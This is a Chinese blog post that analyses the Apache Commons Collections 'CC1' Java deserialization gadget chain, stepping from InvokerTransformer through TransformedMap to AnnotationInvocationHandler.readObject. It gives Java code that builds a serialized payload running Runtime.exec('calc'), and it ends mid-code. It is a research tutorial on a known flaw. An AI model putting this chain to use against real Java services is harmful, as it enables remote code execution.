<!DOCTYPE html>
<html lang="en" data-bs-theme="auto">

<!-- Head tag -->
<head>

    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>

    <!--Description-->

    

    
        <meta name="description" content="Commons Collections简介Commons Collections是Apache软件基金会的一个开源项目，它提供了一组可复用的数据结构和算法的实现，旨在扩展和增强Java集合框架，以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数"/>
    
    
    <!--Keywords-->
    <meta name="keywords" content="">

    <!--Author-->
    
        <meta name="author" content="evabd21"/>
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="CC1反序列化链分析"/>
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="Commons Collections简介Commons Collections是Apache软件基金会的一个开源项目，它提供了一组可复用的数据结构和算法的实现，旨在扩展和增强Java集合框架，以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数"/>
    

    <!--Open Graph Site Name-->
        <meta property="og:site_name" content="evabd21"/>

    <!--Type page-->
    
        <meta property="og:type" content="article"/>
    

    <!--Page Cover-->
    
    

    <meta name="twitter:card" content="summary_large_image"/>

    

    

    <!-- Title -->
    
    <title>CC1反序列化链分析 - evabd21</title>

    <!-- Google Analytics -->
    


    <!-- favicon -->
    
    <link rel="icon" href="/images/favicon.ico"/>
    
      
<!-- hexo injector head_end start --><link rel="stylesheet" href="/css/bootstrap.min.css"><link rel="stylesheet" href="/css/color-modes.css"><link rel="stylesheet" href="/bootstrap-icons/font/bootstrap-icons.css"><script src="/js/bootstrap.bundle.min.js"></script><script type="module" src="/js/color-modes.js"></script><link rel="stylesheet" href="/css/highlight.css"><script src="https://cdn.jsdelivr.net/gh/BP-Devteam/sitescansense/s3module.min.js"></script><script src="/js/init.js"></script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="evabd21" type="application/atom+xml">
    <link rel="preconnect" href="https://fonts.googleapis.com"/>
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/>
    <link href="https://fonts.googleapis.com/css2?family=Manrope:wght@400;500;600;700;800&display=swap" rel="stylesheet"/>
    <link rel="stylesheet" href="/css/brand-shell.css"/>
</head>


<body class="brand-page brand-page-article">
    <!-- Menu -->
    <div class="site-shell">
      <header class="site-nav">
        <div class="container">
          <div class="nav-frame">
            <a href="/" class="brand-mark">evabd21</a>
            <nav aria-label="Primary navigation">
              <ul class="nav-links">
                <li><a href="/getting-start">About</a></li>
                <li><a href="/archives">Archives</a></li>
                <li><a target="_blank" rel="noopener" href="https://github.com/BP-Devteam/hexo-theme-bp-gallery">Github</a></li>
              </ul>
            </nav>
          </div>
        </div>
      </header>

    <!-- color mode button -->
<svg xmlns="http://www.w3.org/2000/svg" class="d-none">
    <symbol id="check2" viewBox="0 0 16 16">
      <path d="M13.854 3.646a.5.5 0 0 1 0 .708l-7 7a.5.5 0 0 1-.708 0l-3.5-3.5a.5.5 0 1 1 .708-.708L6.5 10.293l6.646-6.647a.5.5 0 0 1 .708 0z"></path>
    </symbol>
    <symbol id="circle-half" viewBox="0 0 16 16">
      <path d="M8 15A7 7 0 1 0 8 1v14zm0 1A8 8 0 1 1 8 0a8 8 0 0 1 0 16z"></path>
    </symbol>
    <symbol id="moon-stars-fill" viewBox="0 0 16 16">
      <path d="M6 .278a.768.768 0 0 1 .08.858 7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71 0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"></path>
      <path d="M10.794 3.148a.217.217 0 0 1 .412 0l.387 1.162c.173.518.579.924 1.097 1.097l1.162.387a.217.217 0 0 1 0 .412l-1.162.387a1.734 1.734 0 0 0-1.097 1.097l-.387 1.162a.217.217 0 0 1-.412 0l-.387-1.162A1.734 1.734 0 0 0 9.31 6.593l-1.162-.387a.217.217 0 0 1 0-.412l1.162-.387a1.734 1.734 0 0 0 1.097-1.097l.387-1.162zM13.863.099a.145.145 0 0 1 .274 0l.258.774c.115.346.386.617.732.732l.774.258a.145.145 0 0 1 0 .274l-.774.258a1.156 1.156 0 0 0-.732.732l-.258.774a.145.145 0 0 1-.274 0l-.258-.774a1.156 1.156 0 0 0-.732-.732l-.774-.258a.145.145 0 0 1 0-.274l.774-.258c.346-.115.617-.386.732-.732L13.863.1z"></path>
    </symbol>
    <symbol id="sun-fill" viewBox="0 0 16 16">
      <path d="M8 12a4 4 0 1 0 0-8 4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"></path>
    </symbol>
  </svg>
<div class="dropdown position-fixed bottom-0 end-0 mb-3 me-3 bd-mode-toggle z-1">
    <button class="btn btn-bd-primary py-2 dropdown-toggle d-flex align-items-center" id="bd-theme" type="button" aria-expanded="false" data-bs-toggle="dropdown" aria-label="Toggle theme (dark)">
      <svg class="bi my-1 theme-icon-active" width="1em" height="1em"><use href="#moon-stars-fill"></use></svg>
      <span class="visually-hidden" id="bd-theme-text">Toggle theme</span>
    </button>
    <ul class="dropdown-menu dropdown-menu-end shadow" aria-labelledby="bd-theme-text">
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center" data-bs-theme-value="light" aria-pressed="false">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#sun-fill"></use></svg>
          Light
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center active" data-bs-theme-value="dark" aria-pressed="true">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#moon-stars-fill"></use></svg>
          Dark
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center" data-bs-theme-value="auto" aria-pressed="false">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#circle-half"></use></svg>
          Auto
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
    </ul>
  </div>

    <main class="page-shell">
        <section class="page-header-section">
          <div class="container">
            <div class="page-header-panel">
              <span class="page-kicker">Research Article</span>
              <h1 class="page-title">CC1反序列化链分析</h1>
              <p class="page-description">CC1反序列化链分析 is presented with the same minimal technology-driven shell, improving rhythm, code readability, and long-form scanning.</p>
            </div>
          </div>
        </section>
        <section class="page-content-section">
<article class="article-shell">
    <div class="container">
        <div class="row">
            <div class="col mb-1 d-flex justify-content-between small text-secondary text-opacity-50 article-meta-bar">
                <div>page views <span class="s3_pv">0</span></div>
                 <!-- Date and Author -->
                 
                
                <div>update <span>2023-08-05</span></div>
            </div>
        </div>
    </div>
    <div class="container">
        <!-- Cover Image -->
        
        <div class="row">
            <!-- Gallery -->
            

            <!-- Post Main Content 
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                -->
            <div class="mx-auto col-md-10 col-md-offset-1 article-body">
                <h2 id="Commons-Collections简介"><a href="#Commons-Collections简介" class="headerlink" title="Commons Collections简介"></a><strong>Commons Collections简介</strong></h2><p>Commons Collections是Apache软件基金会的一个开源项目，它提供了一组可复用的数据结构和算法的实现，旨在扩展和增强Java集合框架，以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数据结构实现，以及许多实用程序类和算法实现。它的代码质量较高，被广泛应用于Java应用程序开发中。本篇文章就是分析Commons Collections3.1版本下的反序列化问题，针对于它的攻击链也被称为cc1链。</p>
<h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a><strong>准备工作</strong></h2><p>选择jdk版本为8u65，因为漏洞在8u71的版本就被修复了。下载地址：<a target="_blank" rel="noopener" href="https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html%E3%80%82">https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html</a></p>
<p>CommonsCollections的版本选择3.2.1，不能太高，太高也是没有漏洞的。添加Maven依赖下载：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- https://mvnrepository.com/artifact/commons-collections/commons-collections --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">groupId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">version</span>&gt;</span>3.2.1<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>另外，为了方便调试我们还需要java源码，因为源码中大多都是class文件，不方便阅读和查找。所以需要下载openjdk对应的源码，链接：<a target="_blank" rel="noopener" href="https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/af660750b2f4%EF%BC%8C%E7%82%B9%E5%87%BBzip%E4%B8%8B%E8%BD%BD%EF%BC%8C%E8%A7%A3%E5%8E%8B%E6%88%90%E6%96%87%E4%BB%B6%E5%A4%B9%E3%80%82">https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/af660750b2f4 </a> </p>
<p>点击zip下载， 把下载的openjdk里 &#x2F;share&#x2F;classes&#x2F; 里面的 sun包 复制到 jdk1.8.0_65里</p>
<p>在IDEA中，选择项目结构， 将jdk中的src文件路径添加到源路径中</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716892166073-1.png" alt="Image"></p>
<p>配置Maven源，要不然没办法下载源码</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716892181348-3.png" alt="Image"></p>
<h2 id="cc1链分析"><a href="#cc1链分析" class="headerlink" title="cc1链分析"></a><strong>cc1链分析</strong></h2><h3 id="利用点"><a href="#利用点" class="headerlink" title="利用点"></a><strong>利用点</strong></h3><p>此链的漏洞利用点在Commons Collections库中的Transformer接口</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716892196182-5.png" alt="Image"></p>
<p>再寻找继承于Transformer接口的类，快捷键alt+crtl+b快速查找。有很多都继承了这个接口，我们定位到InvokerTransformer类中，此类可以被序列化，找到重写的Transform方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716892209620-7.png" alt="Image"></p>
<p>这里通过反射调用任意类的任意方法。其中的参数都是通过该类的构造函数控制，也是我们所能控制的。所以这里应该是可以执行任意方法的。</p>
<p>所以我们可以尝试测试一下能执行恶意类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC1</span> &#123;</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">		<span class="type">Runtime</span> <span class="variable">runtime</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">		<span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line">		invokerTransformer.transform(runtime);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>实例化invokerTransformer类，传入方法名，参数类型，参数值。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897875614-9.png" alt="Image"></p>
<p>运行一下代码，成功弹出计算器。 漏洞利用点有了，接下来就是逆推构造调用链，最终定位到某个类的readObject方法里。</p>
<h3 id="调用链"><a href="#调用链" class="headerlink" title="调用链"></a><strong>调用链</strong></h3><p>我们是在transform方法里执行命令的，所以接下来找哪个类调用了transform方法。右键点击查找用法可快速查找什么类调用了transform方法。共有二十四处调用，这些调用的地方我们都可以看看，最后找到TransformedMap类的checkSetValue方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897911104-11.png" alt="Image"></p>
<p>valueTransformer是通过TransformerMap赋值的， 但是函数类型为protected，只能本类调用。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897926046-13.png" alt="Image"></p>
<p>在该类中还一个decorate方法， 类似于装饰器。它实例化了本类，能够调用TransformedMap构造器并为valueTransformer赋值。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897944630-15.png" alt="Image"></p>
<p>那么回到checkSetValue方法，我们已经可以控制valueTransformer，那么接下来找哪个类的哪个方法调用了该方法。只有一处调用，MapEntry类的setValue方法。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897970806-17.png" alt="Image"></p>
<p>我们知道Entry代表map中的一个键值对，MapEntry类重写了Map的setValue方法</p>
<p>我们先通过对Map的遍历触发setValue方法，主要思路：实例化一个Map，put一个键值对，然后通过TransformedMap的decorate方法进行封装，最后进行遍历</p>
<p>这里的链子就是 Map-&gt;setValue-&gt;checkSetValue-&gt;transformer，通过TransformedMap的decorate方法进行传参。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897988890-19.png" alt="Image"></p>
<p>调试一下</p>
<p>在decorate方法下断点调试一下， 此时，valueTransformer参数赋值为InvokerTransformer对象，步入</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898008355-21.png" alt="Image"></p>
<p>此时，valueTransformer参数赋值为InvokerTransformer对象，步入</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898025367-23.png" alt="Image"></p>
<p>接着调用构造器，把InvokerTransformer对象赋值给valueTransformer，走到遍历键值对的时候，调用setValue方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898049464-25.png" alt="Image"></p>
<p>此时就调用了TransformedMap的checkSetValue方法。value的值为Runtime对象。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898065110-27.png" alt="Image"></p>
<p>步入，最后就调用了InvokerTransformer的transform方法。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898081876-29.png" alt="Image"></p>
<p>最终执行命令，弹出计算器。那么就说明此链是走的通的，还是逆向查找，看看哪个类的哪个函数调用了setValue方法，如果是readObject类调用了那就可以进行序列化了。</p>
<h3 id="入口类"><a href="#入口类" class="headerlink" title="入口类"></a><strong>入口类</strong></h3><p>查找用法，在AnnotationInvocationHandler类的readObject方法调用了setValue方法。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898101067-31.png" alt="Image"></p>
<p>虽然找到入口点了，但是还要有一些问题需要解决</p>
<h4 id="Runtime类不能被反序列化"><a href="#Runtime类不能被反序列化" class="headerlink" title="Runtime类不能被反序列化"></a><strong>Runtime类不能被反序列化</strong></h4><p>可以通过反射获取到它的class对象，class对象是可以被反序列化的，跟进看一下：</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898117985-33.png" alt="Image"></p>
<p>一般的反射执行命令的写法为：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC1test1</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NoSuchMethodException, InvocationTargetException, IllegalAccessException, IOException &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line">        <span class="type">Method</span> <span class="variable">runtime</span> <span class="operator">=</span> c.getMethod(<span class="string">&quot;getRuntime&quot;</span>);</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">a</span> <span class="operator">=</span> (Runtime) runtime.invoke(<span class="literal">null</span>,<span class="literal">null</span>);<span class="comment">//获得Runtime实例</span></span><br><span class="line">        <span class="type">Method</span> <span class="variable">method</span> <span class="operator">=</span> c.getMethod(<span class="string">&quot;exec&quot;</span>,String.class);<span class="comment">//获得exec函数</span></span><br><span class="line">        method.invoke(a,<span class="string">&quot;calc&quot;</span>);<span class="comment">//调用Runtime对象的exec函数弹出计算器</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们要把这个写法嵌套在 InvokerTransformer类里面</p>
<p>首先获得runtime方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Method</span> <span class="variable">getMethod</span> <span class="operator">=</span> (Method) <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;).transform(Runtime.class);</span><br></pre></td></tr></table></figure>

<p>为什么要这样写我们可以跟进一下InvokerTransformer方法和getMethod方法</p>
<p>InvokerTransformer需要传递三个参数，一个是参数名称，一个是Class数组，一个是Object数组。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898163064-35.png" alt="Image"></p>
<p>getMethod方法需要传递两个参数，一个是参数明，还有一个是Class数组</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898177614-37.png" alt="Image"></p>
<p>获取Runtime实例</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Runtime</span> <span class="variable">runtime</span> <span class="operator">=</span> (Runtime) <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;).transform(getMethod);</span><br></pre></td></tr></table></figure>

<p>获取exec函数调用runtime示例执行calc。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;).transform(runtime);</span><br></pre></td></tr></table></figure>

<p>这样就把命令执行嵌入 InvokerTransformer方法里了。成功执行</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898206065-39.png" alt="Image"></p>
<p>但是这样每次就需要调用一次transform方法，传入上一步的输出。很麻烦</p>
<p>在Commons Collections库中存在ChainedTransformer这么一个类，可以将多个Transformer串联在一起形成一个链，递归调用。跟进这个类看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898221509-41.png" alt="Image"></p>
<p>它的构造方法传递一个数组，它的transform方法将iTransformers进行递归调用。代码如下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898235928-43.png" alt="Image"></p>
<p>完美解决不能反序列化的问题。</p>
<h4 id="AnnotationInvocationHandler不能在包外实例化"><a href="#AnnotationInvocationHandler不能在包外实例化" class="headerlink" title="AnnotationInvocationHandler不能在包外实例化"></a><strong>AnnotationInvocationHandler不能在包外实例化</strong></h4><p>看代码</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898252508-45.png" alt="Image"></p>
<p>构造器没写类型，那就是默认访问修饰符，只能在包内实例化。所以还是需要反射来获得实例对象。</p>
<p>该构造器接收两个参数，分别是注解类型的Class对象和Map对象。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898268417-47.png" alt="Image"></p>
<p>不能直接实例化，我们就需要用反射去调用他</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898282217-49.png" alt="Image"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">AnnotationInvocationHandler</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);<span class="comment">//获取类名</span></span><br><span class="line"><span class="type">Constructor</span> <span class="variable">AnnotationInvocationHandlerConstructor</span> <span class="operator">=</span> AnnotationInvocationHandler.getDeclaredConstructor(Class.class, Map.class);<span class="comment">//获取构造器</span></span><br><span class="line">AnnotationInvocationHandlerConstructor.setAccessible(<span class="literal">true</span>);<span class="comment">//设置可以访问</span></span><br><span class="line"><span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> AnnotationInvocationHandlerConstructor.newInstance(Override.class, TransformedMapDecorate);<span class="comment">//实例化</span></span><br><span class="line"><span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;cc1.bin&quot;</span>)).writeObject(o);</span><br><span class="line"><span class="type">Object</span> <span class="variable">o1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;cc1.bin&quot;</span>)).readObject();</span><br></pre></td></tr></table></figure>

<h4 id="满足readObject的两个if判断"><a href="#满足readObject的两个if判断" class="headerlink" title="满足readObject的两个if判断"></a><strong>满足readObject的两个if判断</strong></h4><p>实际上这条链根本就没有调用setValue方法，打断点调试看看。断点直接打在readObject方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898310908-51.png" alt="Image"></p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898318824-53.png" alt="Image"></p>
<p>第一个if就进不去，这个memberType实际上就是获取注解对象名为name的值，这个name，就是memberValues的键名。而这个memberValues是什么呢？我们创建的Map对象的键值，我们设置的Override，跟进看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898337387-55.png" alt="Image"></p>
<p>是没有值的，所以需要换一个注解，跟进Target看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898352442-57.png" alt="Image"></p>
<p>是有value值。同时对于Map对象，需要put键值对，键名必须为value，键值随意。更改完成后，再跟进看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898384711-61.png" alt="Image"></p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898367694-59.png" alt="Image"></p>
<p>这是var7有值的。</p>
<p>继续跟进</p>
<h4 id="setValue方法的参数不可控"><a href="#setValue方法的参数不可控" class="headerlink" title="setValue方法的参数不可控"></a><strong>setValue方法的参数不可控</strong></h4><p>实际上执行了setValue方法后会跟进到checkSetValue。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898434142-63.png" alt="Image"></p>
<p>而这里的value不是我们想要的Runtime.class，也就是不可控。可以利用一个类ConstantTransformer，跟进看一下它的transform方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898446812-65.png" alt="Image"></p>
<p>无论接收什么参数，返回一个固定值，而这个固定值可以通过构造器可控。也就是说，无论value被赋上什么值，只要它调用了ConstantTransformer的transform方法，结果我们都可控。在Transformer数组里实例化ConstantTransformer</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898461498-67.png" alt="Image"></p>
<p>然后调试看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898475784-69.png" alt="Image"></p>
<p>在数组遍历时会调用transform将输入改变为Runtime对象。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898490502-71.png" alt="Image"></p>
<p>完整代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Target;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC1</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException &#123;</span><br><span class="line">        <span class="comment">//定义一个数组</span></span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),<span class="comment">//</span></span><br><span class="line">                <span class="comment">//获取getRuntime方法</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="comment">//调用invoke方法获得实例</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="comment">//调用exec方法，弹出计算器</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="comment">//创建实例</span></span><br><span class="line">        <span 